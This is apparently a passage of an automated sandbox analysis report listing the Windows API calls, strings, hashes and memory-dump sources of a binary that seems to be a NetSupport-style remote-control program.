                                                                                          • GetSubMenu.USER32(?,00000000), ref: 005C30A8
                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 005C30C9
                                                                                          • GetMenuItemID.USER32(?,00000001), ref: 005C30D2
                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 005C30DC
                                                                                          • DeleteMenu.USER32(?,00000001,00000400), ref: 005C30F2
                                                                                          • GetMenuItemID.USER32(?,00000001), ref: 005C30FA
                                                                                          • DeleteMenu.USER32(?,-00000001,00000400), ref: 005C3111
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$Delete$Count
                                                                                          • String ID:
                                                                                          • API String ID: 1985338998-0
                                                                                          • Opcode ID: fa2892680ebcefbe2d915a4bb35754c717473b908797b31d7dc96522e4e587ad
                                                                                          • Instruction ID: d42f5f6cd46e90a38f3506a89750bdb42b504de9a67a1095c311bf4423344939
                                                                                          • Opcode Fuzzy Hash: fa2892680ebcefbe2d915a4bb35754c717473b908797b31d7dc96522e4e587ad
                                                                                          • Instruction Fuzzy Hash: D311A976800109BEEB119BA4DC89FFFBBBDFF85714F04801EE501A2141E7749A41CAB1
                                                                                          APIs
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F270E
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F271B
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2728
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2735
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2742
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F275E
                                                                                          • InterlockedDecrement.KERNEL32(00000000), ref: 005F276E
                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 005F2784
                                                                                          Similarity
                                                                                          • API ID: DecrementInterlocked
                                                                                          • String ID:
                                                                                          • API String ID: 3448037634-0
                                                                                          • Opcode ID: b0ca70a5c9aeaa77b74bc1db54593d588039d398eec869ee0f0af50e31cad647
                                                                                          • Instruction ID: df62982f41e78ab9b50e32337cd25dd4c11a69777d8611b1b52f41b4035e0bd3
                                                                                          • Opcode Fuzzy Hash: b0ca70a5c9aeaa77b74bc1db54593d588039d398eec869ee0f0af50e31cad647
                                                                                          • Instruction Fuzzy Hash: E11109B1B0121DA7DB14AB79CCC8BA6BFADFF44794F084416AA08D7140DB78F9008AB0
                                                                                          APIs
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F2677
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F2684
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F2691
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F269E
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F26AB
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F26C7
                                                                                          • InterlockedIncrement.KERNEL32(00000000), ref: 005F26D7
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 005F26ED
                                                                                          Similarity
                                                                                          • API ID: IncrementInterlocked
                                                                                          • String ID:
                                                                                          • API String ID: 3508698243-0
                                                                                          • Opcode ID: 61699a36c9ae1905731a2b07a07a99d7bcbf0ce197330eb4f54dd4e7f5672d6d
                                                                                          • Instruction ID: a6ae8b145c17c760e569a62954a1fd89be94794a1ecadb5d6ee298d116981b41
                                                                                          • Opcode Fuzzy Hash: 61699a36c9ae1905731a2b07a07a99d7bcbf0ce197330eb4f54dd4e7f5672d6d
                                                                                          • Instruction Fuzzy Hash: 46111BB1B0031DABDB14AFA9DC84BA6BBACBF40754F084416A608D7144CF78E950CBF5
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005D6429
                                                                                            • Part of subcall function 005B4990: RegOpenKeyExW.ADVAPI32(?,80000002,00000000,00596384,?,00000000,752F55F0,00000010,?,00596384,80000002,?,00020019), ref: 005B49AC
                                                                                            • Part of subcall function 005B44E0: RegEnumKeyExW.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 005B452B
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: EnumOpenwsprintf
                                                                                          • String ID: %s\%s$IsA()$Restore Reg, %s=%d$Restore Reg, %s=%s$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h
                                                                                          • API String ID: 934838074-744369672
                                                                                          • Opcode ID: bf9d482b229095519f25b230298dfc82fdf4b70641eda533721a055c8721e4da
                                                                                          • Instruction ID: 9dd82e6d3baaa1799c2053ebaf3722b607047f51dcdd1331bf5e87d074e0091a
                                                                                          • Opcode Fuzzy Hash: bf9d482b229095519f25b230298dfc82fdf4b70641eda533721a055c8721e4da
                                                                                          • Instruction Fuzzy Hash: D08184719006199BCB24DB58DC55BEBBBB8FF88715F04459AE909A3281FB70AF84CF50
                                                                                          APIs
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005CC611
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005CC6DE
                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 005CC6EF
                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 005CC6FE
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 005CC70D
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryFileName$EnvironmentExpandOpenSaveStrings
                                                                                          • String ID: X
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C8C1C
                                                                                          • SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 005C8C5F
                                                                                          • SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 005C8CB7
                                                                                          Similarity
                                                                                          • API ID: FolderPath$FileModuleName
                                                                                          • String ID: ..\CTL32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: Local\$already created$already opened$name too long$:Y
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 005E284C
                                                                                          • DeleteAce.ADVAPI32(00000104,00000000), ref: 005E28B6
                                                                                          • GetProcAddress.KERNEL32(00000104,SetNamedSecurityInfoW), ref: 005E28D7
                                                                                          • LocalFree.KERNEL32(?), ref: 005E291E
                                                                                          Similarity
                                                                                          • API ID: AddressProc$DeleteFreeLocal
                                                                                          • String ID: GetNamedSecurityInfoW$SetNamedSecurityInfoW
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(newdev.dll,DE64E134), ref: 0059A123
                                                                                          • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesW), ref: 0059A135
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0059A146
                                                                                          • GetLastError.KERNEL32 ref: 0059A1DC
                                                                                          Similarity
                                                                                          • API ID: Library$AddressErrorFreeLastLoadProc
                                                                                          • String ID: UpdateDriverForPlugAndPlayDevicesW$newdev.dll
                                                                                          APIs
                                                                                          • MoveFileExW.KERNEL32(?,?,00000000), ref: 005D2FB6
                                                                                          • MoveFileExW.KERNEL32(?,?,00000001), ref: 005D2FE0
                                                                                          • MoveFileExW.KERNEL32(?,?,00000001), ref: 005D3053
                                                                                          Similarity
                                                                                          • API ID: FileMove
                                                                                          • String ID: .dll$.old$.org
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 005CAE46
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 005CAE67
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005CAE7C
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005CAE87
                                                                                          • GetDC.USER32(?), ref: 005CAE92
                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 005CAE9D
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 005CAEA7
                                                                                            • Part of subcall function 005C2030: LoadLibraryW.KERNEL32(User32.dll,00000000,005CAE2C), ref: 005C2038
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$CapsDeviceErrorFreeLastLoadOpenReleaseVersion
                                                                                          • String ID: GetDpiForWindow
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(0063B71C,?,00000000,DE64E134), ref: 005BC286
                                                                                          • LeaveCriticalSection.KERNEL32(0063B71C,?,00000000,DE64E134), ref: 005BC2D9
                                                                                          • DeleteCriticalSection.KERNEL32(?,DE64E134), ref: 005BC2E6
                                                                                          • DeleteCriticalSection.KERNEL32(0063B71C,?,DE64E134), ref: 005BC305
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Delete$EnterLeave
                                                                                          • String ID: ..\CTL32\Refcount.cpp$p < ep
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 005A8B91
                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005A8BDB
                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 005A8C02
                                                                                            • Part of subcall function 005A3D80: RegQueryValueExW.ADVAPI32(?,DisplayName,00000000,00000000,?,00000400), ref: 005A3DD2
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005A8C3F
                                                                                            • Part of subcall function 005A6240: RegQueryValueExW.ADVAPI32(?,InstallLocation,00000000,00000000,?,00000400), ref: 005A629C
                                                                                            • Part of subcall function 005A6240: RegQueryValueExW.ADVAPI32(?,DisplayIcon,00000000,00000000,?,00000400), ref: 005A62DA
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005A8C55
                                                                                          Strings
                                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 005A8B81
                                                                                          Similarity
                                                                                          • API ID: QueryValue$CloseOpen$Enum
                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                          • API String ID: 2995688569-3722870514
                                                                                          • Opcode ID: 7787767b6a634da9561a63f68f4939ca20a6b024876ceb76a9c4a43a633c81f4
                                                                                          • Instruction ID: 9f2575dbb29be57ff6e63f2f5f421a6a8bf6887317789e9b20b96a8b1bec9b6e
                                                                                          • Opcode Fuzzy Hash: 7787767b6a634da9561a63f68f4939ca20a6b024876ceb76a9c4a43a633c81f4
                                                                                          • Instruction Fuzzy Hash: 7C21B6F5940218ABCB34CB50DC54FEEB779FB89710F044199BB0977240CA309E858FA8
                                                                                          APIs
                                                                                          • SendMessageTimeoutW.USER32(?,0000000D,00000100,?,00000002,00000064,?), ref: 005D5111
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 005D5129
                                                                                          • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 005D5145
                                                                                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?), ref: 005D516C
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005D5173
                                                                                          Strings
                                                                                          • pid=%d, hwnd=%x, fn=%s, title=%s, xrefs: 005D51BC
                                                                                          Similarity
                                                                                          • API ID: Process$CloseFullHandleImageMessageNameOpenQuerySendThreadTimeoutWindow
                                                                                          • String ID: pid=%d, hwnd=%x, fn=%s, title=%s
                                                                                          • API String ID: 3884872023-4264767816
                                                                                          • Opcode ID: 479255f5140d7c5f479a1fb2e887c5d6e6c5c394fbfc28851d32f46ea020646c
                                                                                          • Instruction ID: 66ad274745eb0d9b92cb2e6906c4c15b598815afae41bc7de3bad739aabfdbec
                                                                                          • Opcode Fuzzy Hash: 479255f5140d7c5f479a1fb2e887c5d6e6c5c394fbfc28851d32f46ea020646c
                                                                                          • Instruction Fuzzy Hash: E82171B1900619ABEB309B54CC59FEAB7B9EB44704F0481ABB605A7180E6B05EC5CFA5
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 005AC2E5
                                                                                          • GetClassNameW.USER32(?,?,00000040), ref: 005AC2F9
                                                                                          • FindWindowW.USER32(?,00000000), ref: 005AC340
                                                                                          • Sleep.KERNEL32(?,?,?), ref: 005AC35C
                                                                                          • FindWindowW.USER32(?,00000000), ref: 005AC370
                                                                                          Similarity
                                                                                          • API ID: Window$Find$ClassNameSleep
                                                                                          • String ID: gfff
                                                                                          • API String ID: 1867012073-1553575800
                                                                                          • Opcode ID: af245a287045e3c2128bb73392aaf29f6568186427ab7a8275c38ec2c1fb2fc2
                                                                                          • Instruction ID: 5c0c7ab9ef1ed604d2805c3268306ceea3ca727be3e73e43d2262c40f509c783
                                                                                          • Opcode Fuzzy Hash: af245a287045e3c2128bb73392aaf29f6568186427ab7a8275c38ec2c1fb2fc2
                                                                                          • Instruction Fuzzy Hash: 7921D372A00615ABDF208F66DC84BEEBBA9BB45750F08C056F908D7240DB30ED458BE1
                                                                                          APIs
                                                                                          • GetSysColor.USER32(0000000F), ref: 005C2739
                                                                                          • GetSysColor.USER32(00000014), ref: 005C2750
                                                                                          • GetDC.USER32(00000000), ref: 005C2789
                                                                                          • CreateDIBitmap.GDI32(00000000,00000028,00000004,?,00000028,00000000), ref: 005C27A4
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005C27AF
                                                                                          Similarity
                                                                                          • API ID: Color$BitmapCreateRelease
                                                                                          • String ID: (
                                                                                          • API String ID: 1671621915-3887548279
                                                                                          • Opcode ID: b0e18b9ebd2bbd70300398b7a6c05b9b922c1689bec62033f1854ec9dba683bc
                                                                                          • Instruction ID: 07b30743f479c0c5ac01e470fe99703b7b63b82370642059e26d516aae7ea29c
                                                                                          • Opcode Fuzzy Hash: b0e18b9ebd2bbd70300398b7a6c05b9b922c1689bec62033f1854ec9dba683bc
                                                                                          • Instruction Fuzzy Hash: CC217E71E052489FDB14DBB99C05BDEBBF5AB88300F0080AEE548EB381DA755A04CFA5
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: %s_%08x%08x$:Y
                                                                                          • API String ID: 2111968516-2700986899
                                                                                          • Opcode ID: 7ff11037695d9bf7e54a16e9c064f77384a4c228bd34366602764855417b24e6
                                                                                          • Instruction ID: 4d68b6975e799e45b1d4b856935dbe3d46ae1b8547d348aa87278d7fc5cdd9ed
                                                                                          • Opcode Fuzzy Hash: 7ff11037695d9bf7e54a16e9c064f77384a4c228bd34366602764855417b24e6
                                                                                          • Instruction Fuzzy Hash: 2B2127B5B00109AF8B04DF99CC41CAFBBBDEF8C220B248159FD09DB351D671AC428BA0
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 005B4099
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 005B410D
                                                                                          • SetCursor.USER32(00000000), ref: 005B4114
                                                                                            • Part of subcall function 005B3F70: IsWindow.USER32(?), ref: 005B3F7D
                                                                                            • Part of subcall function 005B3F70: ShellExecuteW.SHELL32(?,open,?,00000000,0061A054,00000001), ref: 005B3FC6
                                                                                          Similarity
                                                                                          • API ID: CursorWindow$ExecuteLoadShell
                                                                                          • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                          • API String ID: 3131440150-763374134
                                                                                          • Opcode ID: 76ec17db3701b9e46b3b8b99107f22282258105d487069d21c40a72bbbd71660
                                                                                          • Instruction ID: 1138338ddf7b770fb3a291aa8deb56943de99cb7cfbe887d585fb960dbb4c358
                                                                                          • Opcode Fuzzy Hash: 76ec17db3701b9e46b3b8b99107f22282258105d487069d21c40a72bbbd71660
                                                                                          • Instruction Fuzzy Hash: 9E112973E8121537CB203A506C0BEDB3F4DBFA5766F084021FD08A6142E766B9448AF6
                                                                                          APIs
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005E10DA
                                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 005E1108
                                                                                          • MoveFileExW.KERNEL32(?,?,00000004), ref: 005E1127
                                                                                          Similarity
                                                                                          • API ID: File$Move$Copy
                                                                                          • String ID: .new$Copy %s to %s$pcigina
                                                                                          • API String ID: 2731655860-4090019360
                                                                                          • Opcode ID: 36531302fd93b725dddb7d7d5493f65d0311541af26d828c90a274b119168f65
                                                                                          • Instruction ID: 58b25656bb09c989b7402ac8642daf89af96e168ce7b50f23084684f5aafd10a
                                                                                          • Opcode Fuzzy Hash: 36531302fd93b725dddb7d7d5493f65d0311541af26d828c90a274b119168f65
                                                                                          • Instruction Fuzzy Hash: EA2126B6E4021886CB349F55CD56BEA73B9FF94310F000099FB4A931C1EA714E80CBA1
                                                                                          APIs
                                                                                          • BeginPaint.USER32(?,?), ref: 005D225C
                                                                                          • EndPaint.USER32(?,?), ref: 005D2267
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • GlobalFree.KERNEL32(?), ref: 005D228E
                                                                                          • DefWindowProcW.USER32(?,?,?,?,000000FF), ref: 005D229B
                                                                                          Similarity
                                                                                          • API ID: Paintwsprintf$BeginFreeGlobalLocalProcTimeWindowwvsprintf
                                                                                          • String ID: Create main window$Destroy Window
                                                                                          • API String ID: 82888663-300420290
                                                                                          • Opcode ID: e3915db943ebdd3d9a4e10bdfe6c50d41cb8b00055fba7d5d69aad26b0101d94
                                                                                          • Instruction ID: d692d29d303bee07c46d289014cbc81a512cccff69896e2d26c45957bae65ac6
                                                                                          • Opcode Fuzzy Hash: e3915db943ebdd3d9a4e10bdfe6c50d41cb8b00055fba7d5d69aad26b0101d94
                                                                                          • Instruction Fuzzy Hash: A51193799442099BCB24EF9C9C899FE7BA9FB66714F044027F44693341D6305D02CBA2
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • LoadLibraryW.KERNEL32(shcore.dll), ref: 005CD0CF
                                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 005CD0F3
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005CD103
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadOpenProcVersion
                                                                                          • String ID: SetProcessDPIAwareness(%d)$SetProcessDpiAwareness$shcore.dll
                                                                                          • API String ID: 1428820756-152109829
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 005941FD
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00594237
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0059424B
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00594256
                                                                                          Strings
                                                                                          • (idata->flags & CFG_VOLATILE) == 0, xrefs: 00594212
                                                                                          • ..\CTL32\Config.cpp, xrefs: 0059420D
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Leave$DeleteEnter
                                                                                          • String ID: (idata->flags & CFG_VOLATILE) == 0$..\CTL32\Config.cpp
                                                                                          • API String ID: 122283594-2091732786
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,00000000), ref: 006102FA
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000), ref: 00610380
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000), ref: 006103F3
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,006104DA,00000000,00000000,00000000), ref: 0061040C
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,006104DA,00000000,00000000,00000000), ref: 00610468
                                                                                          • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 0061047C
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$AllocateCompareHeapInfoString
                                                                                          • String ID:
                                                                                          • API String ID: 1019172818-0
                                                                                          APIs
                                                                                          • InitializeCriticalSection.KERNEL32(0063B71C,DE64E134), ref: 005BC129
                                                                                            • Part of subcall function 005E91A1: RaiseException.KERNEL32(?,x)c,00000000,?,~6^,00632978,?,005E2ECB,00000000,?,005E367E,?), ref: 005E91E3
                                                                                          • InitializeCriticalSection.KERNEL32(00000000), ref: 005BC1B1
                                                                                          • EnterCriticalSection.KERNEL32(0063B71C), ref: 005BC1CD
                                                                                          • LeaveCriticalSection.KERNEL32(0063B71C,?,00000001), ref: 005BC223
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Initialize$EnterExceptionLeaveRaise
                                                                                          • String ID: ..\CTL32\Refcount.cpp$p < ep
                                                                                          • API String ID: 3261150159-1059512116
                                                                                          APIs
                                                                                            • Part of subcall function 0059AD70: GetLastError.KERNEL32 ref: 0059ADB9
                                                                                          • GetLastError.KERNEL32 ref: 005DE91B
                                                                                          • GetLastError.KERNEL32 ref: 005DE99D
                                                                                          Strings
                                                                                          • restart audio ret %d, xrefs: 005DE95E
                                                                                          • Install audio driver ret x%x, e=%d, xrefs: 005DE9A5
                                                                                          • Remove audio driver ret %d, e=%d, xrefs: 005DE923
                                                                                          • Attempting to restart audio, xrefs: 005DE944
                                                                                          Similarity
                                                                                          • API ID: ErrorLast
                                                                                          • String ID: Attempting to restart audio$Install audio driver ret x%x, e=%d$Remove audio driver ret %d, e=%d$restart audio ret %d
                                                                                          • API String ID: 1452528299-2276465569
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 005B6E59
                                                                                          • SelectPalette.GDI32(00000000,?,00000000), ref: 005B6E77
                                                                                          • RealizePalette.GDI32(00000000), ref: 005B6E80
                                                                                          • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 005B6E91
                                                                                          • SelectPalette.GDI32(00000000,00000000,00000000), ref: 005B6EA1
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B6EAA
                                                                                          Similarity
                                                                                          • API ID: Palette$Select$BitmapCreateRealizeRelease
                                                                                          • String ID:
                                                                                          • API String ID: 1213237138-0
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000F2), ref: 005D30A4
                                                                                          Similarity
                                                                                          • API ID: DirectorySystem
                                                                                          • String ID: .dll$.org
                                                                                          • API String ID: 2188284642-843266101
                                                                                          APIs
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 005DA75E
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          Similarity
                                                                                          • API ID: ByteCharLoadMultiStringWidewvsprintf
                                                                                          • String ID: %s$0x%lx$Written nsm.lic, cks=%x, wrap=%d, product=%d, expiry=%d/%d/%d, start=%d/%d/%d$r+t
                                                                                          • API String ID: 3313190917-3235974708
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(?,?,00000104), ref: 005B69F8
                                                                                          • GetModuleFileNameW.KERNEL32(00000000), ref: 005B69FF
                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 005B6A32
                                                                                          Similarity
                                                                                          • API ID: FileModuleName$HandleSave
                                                                                          • String ID: Pa$X
                                                                                          • API String ID: 3331948136-4184412011
                                                                                          APIs
                                                                                            • Part of subcall function 005BC560: GetComputerNameW.KERNEL32(?,?), ref: 005BC60E
                                                                                          • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 005BC712
                                                                                          • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 005BC74E
                                                                                          Similarity
                                                                                          • API ID: Delete$ComputerName
                                                                                          • String ID: IsA()$\Registry\Machine\$e:\nsmsrc\nsm\1410\1410\ctl32\NSMString.h
                                                                                          • API String ID: 2275906161-1104758002
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(?,0000004A,?,?), ref: 005AC469
                                                                                          • SendMessageW.USER32(00000000,0000004A,?,?), ref: 005AC4A2
                                                                                            • Part of subcall function 005AC2C0: IsWindow.USER32(?), ref: 005AC2E5
                                                                                            • Part of subcall function 005AC2C0: GetClassNameW.USER32(?,?,00000040), ref: 005AC2F9
                                                                                            • Part of subcall function 005AC2C0: FindWindowW.USER32(?,00000000), ref: 005AC340
                                                                                            • Part of subcall function 005AC2C0: Sleep.KERNEL32(?,?,?), ref: 005AC35C
                                                                                            • Part of subcall function 005AC2C0: FindWindowW.USER32(?,00000000), ref: 005AC370
                                                                                          • PostMessageW.USER32(00000000,0000004A,?,?), ref: 005AC4BE
                                                                                          Strings
                                                                                          • m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData), xrefs: 005AC445
                                                                                          • ..\CTL32\ipc.cpp, xrefs: 005AC440
                                                                                          Similarity
                                                                                          • API ID: MessageWindow$FindPost$ClassNameSendSleepThread
                                                                                          • String ID: ..\CTL32\ipc.cpp$m_cds.cbData < m_pSharedHeader->dwDataLen - sizeof(IPCData)
                                                                                          • API String ID: 3524374798-1411620790
                                                                                          APIs
                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 005CEFA0
                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 005CEFB8
                                                                                          • DestroyIcon.USER32(?), ref: 005CEFC5
                                                                                          • ImageList_GetImageCount.COMCTL32(?), ref: 005CEFCC
                                                                                          Similarity
                                                                                          • API ID: IconImage$List_$CountDestroyExtractReplace
                                                                                          • String ID: "
                                                                                          • API String ID: 2255942099-123907689
                                                                                          APIs
                                                                                            • Part of subcall function 005BC4C0: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005BC4EA
                                                                                            • Part of subcall function 005BC4C0: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005BC53D
                                                                                          • GetComputerNameW.KERNEL32(?,?), ref: 005BC60E
                                                                                          Similarity
                                                                                          • API ID: ComputerDirectoryInformationNameSystemVolume
                                                                                          • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                          • API String ID: 1311402438-1858614750
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(shcore.dll,DE64E134), ref: 0059E8BE
                                                                                          • GetProcAddress.KERNEL32(00000000,GetDpiForMonitor), ref: 0059E8D2
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0059E91A
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: GetDpiForMonitor$shcore.dll
                                                                                          • API String ID: 145871493-92391707
                                                                                          APIs
                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0061F4D8,?,00000010,?), ref: 005D41E4
                                                                                          • lstrcmpiW.KERNEL32(00000001,0062250C), ref: 005D4215
                                                                                          • lstrcmpiW.KERNEL32(00000001,Yes), ref: 005D4224
                                                                                          Similarity
                                                                                          • API ID: lstrcmpi$PrivateProfileString
                                                                                          • String ID: True$Yes
                                                                                          • API String ID: 940435393-1480529194
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(USER32), ref: 005AE570
                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 005AE57C
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: GetMonitorInfoW$USER32$h
                                                                                          • API String ID: 1646373207-2164005547
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(dwmapi.dll), ref: 005CA802
                                                                                          • GetProcAddress.KERNEL32(00000000,DwmIsCompositionEnabled), ref: 005CA81E
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005CA849
                                                                                          Similarity
                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                          • String ID: DwmIsCompositionEnabled$dwmapi.dll
                                                                                          • API String ID: 145871493-1198327662
                                                                                          • Opcode ID: edc7d163174f78cf11d19acac3c1ddc303a2f5653892d8994cc5eb4c807f9e4e
                                                                                          • Instruction ID: 163ebe4dd0b31f182e01f4a5de5f10133ec08e3c90357fa6c454fc46ee328645
                                                                                          • Opcode Fuzzy Hash: edc7d163174f78cf11d19acac3c1ddc303a2f5653892d8994cc5eb4c807f9e4e
                                                                                          • Instruction Fuzzy Hash: 5601F5B14007A89FE7314FB8BC29B953ED5EF01B68F14922CE818890D1D7308941CFDA
                                                                                          APIs
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000004,?,?), ref: 005AECC3
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AECC9
                                                                                          • RegSetValueExW.ADVAPI32(?,Policy,00000000,00000003,?,?), ref: 005AECEA
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AECF0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
